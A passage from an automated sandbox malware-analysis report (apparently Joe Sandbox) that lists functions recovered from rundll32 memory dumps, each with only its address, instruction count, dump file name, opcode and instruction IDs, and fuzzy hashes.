                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f791d3445e84586dbe9f80999dd1f580e770e8a6d9da9ee3eea6f4e51a97e2d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 44eeb060c6ba7f495d478b49b585212adcb679bd2a15366c46fde2feebbd3015
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f791d3445e84586dbe9f80999dd1f580e770e8a6d9da9ee3eea6f4e51a97e2d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE0C23221C7949FC3062B24AC164A5BFB9DB0A61031804ABF8C1CB2A2CA621C50CBE1
                                                                                                                                                                                                                                                                                                                                    Function 06D4C1E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c897ceb70868b51ff47f0b485f7ed0bb253a6d88dd3b24b193236c6158ca9105
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 207e48bf8cd81c4691f71cc13ae68b2ecdebfb20d6dbebf16bb0cd3d967ac2a6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c897ceb70868b51ff47f0b485f7ed0bb253a6d88dd3b24b193236c6158ca9105
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E0C2352003049BC2147758F9189AEBBDBFBC5764B00052DE54783704DE71B845CBA4
                                                                                                                                                                                                                                                                                                                                    Function 06D46AC0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5680bd21a1916b7909e2617ce3120b85d17437595d527bbca4c16ead85098cb7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f28da0690ae9c74c54ac33f0fa26d1ba159d7ad426c2102d558c881928b0294
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5680bd21a1916b7909e2617ce3120b85d17437595d527bbca4c16ead85098cb7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE0EC753042549FD714EF5CD980C91BBE9EF59254355819AE849CF312D722ED12CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D43CD0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 76341926390961a1422307a85e3b9bc163fe303ebe162c5fc9ed5b272e96c595
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 68112edb38f46e9d5fb800bb67847cd7b102b1cf841cd13f86053e3af078b96c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76341926390961a1422307a85e3b9bc163fe303ebe162c5fc9ed5b272e96c595
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D0A736300139170644229E781446E779FCBC5D71305012FEB0AC3341DE555C4153E5
                                                                                                                                                                                                                                                                                                                                    Function 06D446D8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1185e81109b4e912ccab6f35e20c2d9dcb1a89d62ea792b0eebe0d01f3a13cd4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c48c69590e63df604bc49282f51fe1457599ffe06d556c7ee5508e5a86295bfc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1185e81109b4e912ccab6f35e20c2d9dcb1a89d62ea792b0eebe0d01f3a13cd4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E0B674E0420DAFCB44EFE8D55459DFBF5EF48300F0081AAE809E7354EA345A448F81
                                                                                                                                                                                                                                                                                                                                    Function 06D43938 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e63e8d5e6739807d81a4e8b938852e1d6eadc874f26149bebe99df8f95533290
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ecbdb34c991e0c1e9dc0cc0cb74be4cc2040184999f34649f8cf16cec5f17e0
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63e8d5e6739807d81a4e8b938852e1d6eadc874f26149bebe99df8f95533290
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49D02B21F1E3905BC71123B838045597F8DCF42610F0604EBDEC897247C9244C0083A0
                                                                                                                                                                                                                                                                                                                                    Function 06D40C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0417cb559c11f57ec41cb90643326e2930d1bc1cc15db3a729f26a584d66f7bb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4f338a15c822ce164186110abcf92c1577ddc5249c92bbaad7a6b1fd454d431b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0417cb559c11f57ec41cb90643326e2930d1bc1cc15db3a729f26a584d66f7bb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3D0A7322241186F47447718ED4997ABBA9EB843613104433FA0283324CD61AC508BE5
                                                                                                                                                                                                                                                                                                                                    Function 06D43D10 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 34334792a69c114488321426888ddef171247ab6826efacb3d2a2cfd3d078c81
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d70085cfef04df37cc3db98c9185c5a796d4c58c08f7680ae070ad9cce0c6408
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34334792a69c114488321426888ddef171247ab6826efacb3d2a2cfd3d078c81
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BD01730A0010EEF8B40DFB8EA4159DBBB9EB44224B1045A9D809D3380EE716F00ABA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4E32A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 00b041a191bcbc6a56e7e276fb1be8a085f3fbb9d29c5f289cd59d0558ce8fa2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3691847dc7d29f3b80a2531a69593e801ff59baeceda4ba01fc5e2e49e6d6b60
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b041a191bcbc6a56e7e276fb1be8a085f3fbb9d29c5f289cd59d0558ce8fa2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E01230A1420BEBDB65AFE0C565BAE7771BF04705F204455D441A6258DF748906CF80
                                                                                                                                                                                                                                                                                                                                    Function 06D42968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 431fa1a11dc38941c068ef50624d3e9c8cdd9c9315f013c9b6bc247a33a76e9c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e1ae955deead19f335bdff36bbdba31f5a7508b3cd1d1ff0a49efe608fd5edc3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 431fa1a11dc38941c068ef50624d3e9c8cdd9c9315f013c9b6bc247a33a76e9c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD05E74905209DFCF00DFB4EA0595DBBF9EB44200B209AA69404D3224EA306F509B80
                                                                                                                                                                                                                                                                                                                                    Function 06D43C98 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0db421ce19e3710745265506ffd19651a810cf34ca0cb5fd9a18bd635170e17b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 74d5e9bc8835bd731c4d3abc29b0f2d715e011cbf060f83d16784d5b084c4c90
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0db421ce19e3710745265506ffd19651a810cf34ca0cb5fd9a18bd635170e17b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33D01230714219CFCB88FBA9E95557577A9DBC861530088ACA90FC7342DF26FC128680
                                                                                                                                                                                                                                                                                                                                    Function 06D40440 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0bde37b2aeb3ae73d7089164f2d00579bfbff48f4665c9227ddf5d8cbc8e91ac
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 18cea63f9079af1ac22e071b14b35f1b8009309f622554990c744aee0e54bde1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bde37b2aeb3ae73d7089164f2d00579bfbff48f4665c9227ddf5d8cbc8e91ac
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AD0123505E3816FD7128760AD49896BF326E92300749469AE48185012C3290958C771
                                                                                                                                                                                                                                                                                                                                    Function 06D446B0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 740131d4c8fd51368f57d3c189a84bb0209b50a226da4a867ae3bcb1e9e282a6
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8852bc75330cb5a187c575a93f3f2af58861646f397a09c9751e9f2e8b52842f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 740131d4c8fd51368f57d3c189a84bb0209b50a226da4a867ae3bcb1e9e282a6
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEB0927094530CAF8620DB99990185ABBACDA0A310F0001D9F90887320D976E91056D1

                                                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 06D4F7E8 Relevance: 7.6, Strings: 6, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$,oq$,oq$Hoq$`]pq$`]pq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4238504177
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4cf62a974fd825e366046659274f62e08c967dbd738b390048fe222153fec5cb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d4bde62964159b4d08430c1f3a51e621829f50bb43b54f0d159fbdea49fe1251
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cf62a974fd825e366046659274f62e08c967dbd738b390048fe222153fec5cb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F416731B04228CFD7A46B2E941446E7BEAEFCA66132804ABD146CF3B1DE21DC41C7D5

                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 072F50B8 Relevance: .3, Instructions: 283COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 526e83075c8be9d470132a69ff05cc964acc61931db03629ad36ef09aee695c1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ce5a29d734d945b0ab097603ba20100f6152b9f11d3bfe75f6494ebb2d659dd4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 526e83075c8be9d470132a69ff05cc964acc61931db03629ad36ef09aee695c1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69B13CB0E1060ACFDB14CFAAC98579EFBF2AF88314F248139D915E7254EB749855CB81
                                                                                                                                                                                                                                                                                                                                    Function 072F59A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: be212112901ada905cc06b787ba2d6a6c1f070c1baa4502b4f626c99f5424ad9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ffe4fb3d06825d87c5b96ce5c0ce33c6a4f863d7717983b9eeacf210443ae64f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be212112901ada905cc06b787ba2d6a6c1f070c1baa4502b4f626c99f5424ad9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BB15DB0E1020ACFDB10CFAAC98579DFBF2AF88714F148139D915EB254EB749856CB91
                                                                                                                                                                                                                                                                                                                                    Function 072F1630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6110b8498cec7e4bdcd678edeb02c94295c6da38133f2da8702dc4d1f495f693
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d8b16a881b16b61afb293291c7c681b3f663457b9e783e25b83bff9263cb7664
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6110b8498cec7e4bdcd678edeb02c94295c6da38133f2da8702dc4d1f495f693
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251C2B1B102098FCB15DF79D8506AEBBEAEF89250B54813AE909D7365DB309C11CB91
                                                                                                                                                                                                                                                                                                                                    Function 072F1080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d9ed0c2d1b8074902bd779339d2ade2eaa65d0ac31628abc449db008161b08a7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 10a11de540b7905c5d69b67018d34bb9cbe3b92eb33d5ad1bd02c8e38b3f4fa2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9ed0c2d1b8074902bd779339d2ade2eaa65d0ac31628abc449db008161b08a7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0771F5B1B20219DFDB149FB5C814AAEB6A7EFC8340F148039E606EB3A4DE71DC528751
                                                                                                                                                                                                                                                                                                                                    Function 072F0C1C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c1350afc1038a3848c912c03b9bf8a79260616271a22c56a193aef1633b32d9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 092d7069a4d4edd3d58175c22043d22ed175828d82894e52559b18f1588b3339
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c1350afc1038a3848c912c03b9bf8a79260616271a22c56a193aef1633b32d9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C63157707282899BE715677994243EEBFF69BCA310F5480BBD601EB286CE744D0487E2
                                                                                                                                                                                                                                                                                                                                    Function 072F50AD Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c634cffe15fe6c7b11a59f1a7d98b5365e866706b672b6757f9b0d46874fd39
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6109e3d855704c4fcedb8a63230233663abe7d6e4d02494a488486aa4630d05
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c634cffe15fe6c7b11a59f1a7d98b5365e866706b672b6757f9b0d46874fd39
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91C158B0E1020ACFDB10CFAAD9857EDFBF1AF48314F248139D915A7254EB749895CB91
                                                                                                                                                                                                                                                                                                                                    Function 072F599C Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 86c1318f260df0a582bb4d0677fcdad080e5afabc8665df906e8ac12d523fa82
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 591c964db2d4541d9891768237c5ce1f6940efd268cb56eed62ae278a9b6c115
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86c1318f260df0a582bb4d0677fcdad080e5afabc8665df906e8ac12d523fa82
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5B16AB0E1020ACFDB10CFAAC9817DDFBF1AF48314F248139E915AB254EB749865CB91
                                                                                                                                                                                                                                                                                                                                    Function 072F2268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
